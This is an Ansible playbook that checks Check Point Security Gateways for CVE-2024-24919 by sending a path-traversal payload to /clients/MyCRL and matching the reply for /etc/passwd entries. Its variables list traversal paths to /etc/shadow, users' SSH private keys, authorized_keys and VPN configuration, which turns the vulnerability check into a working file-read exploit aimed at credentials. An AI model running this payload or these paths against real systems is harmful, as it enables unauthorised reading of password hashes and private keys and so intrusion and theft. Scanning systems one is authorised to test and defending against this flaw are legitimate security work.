- name: CVE-2024-24919 - Check Point Security Gateway Information Disclosure (Arbitrary File Read)
  gather_facts: false
  hosts: all
  vars:
    ports:
      - 8080
    pattern: '^(admin|pcap|monitor|root):'
    uris:
      - "/clients/MyCRL"
    paths:
      - "aCSHELL/../../../../../../../config/db/initial"
      - "aCSHELL/../../../../../../../etc/fstab"
      - "aCSHELL/../../../../../../../etc/passwd"
      - "aCSHELL/../../../../../../../etc/shadow"
      - "aCSHELL/../../../../../../../etc/ssh/sshd_config"
      - "aCSHELL/../../../../../../../etc/vpn/vpn.conf"
      - "aCSHELL/../../../../../../../home/root/.ssh/authorized_keys"
      - "aCSHELL/../../../../../../../home/*/.ssh/authorized_keys"
      - "aCSHELL/../../../../../../../home/*/.ssh/id_rsa"
      - "aCSHELL/../../../../../../../home/*/.ssh/known_hosts"
      - "aCSHELL/../../../../../../../opt/checkpoint/conf/"
      - "aCSHELL/../../../../../../../sysimg/CPwrapper/SU/Products.conf"
    try_all: false
    try_ran: false

  tasks:
    - name: Assess vulnerable condition
      ansible.builtin.uri:
        url: "http{{ (item.0 | int == 443) | ternary('s', '') }}://{{ inventory_hostname }}:{{ item.0 }}{{ item.1 }}"
        method: POST
        timeout: 2
        status_code: 200
        return_content: true
        force: true
        validate_certs: false
        body:
          "aCSHELL/../../../../../../../etc/passwd"
      register: response
      loop: "{{ ports | product(uris) }}"
      ignore_errors: true
      delegate_to: 127.0.0.1

    - name: Assert patch condition response
      ansible.builtin.assert:
        that:
          - item.content | regex_search(pattern)
        fail_msg: "Vulnerbale"
        success_msg: "Not Vulnerable"
      loop: "{{ response.results }}"
      when:
        - response is defined
        - item.status == 200
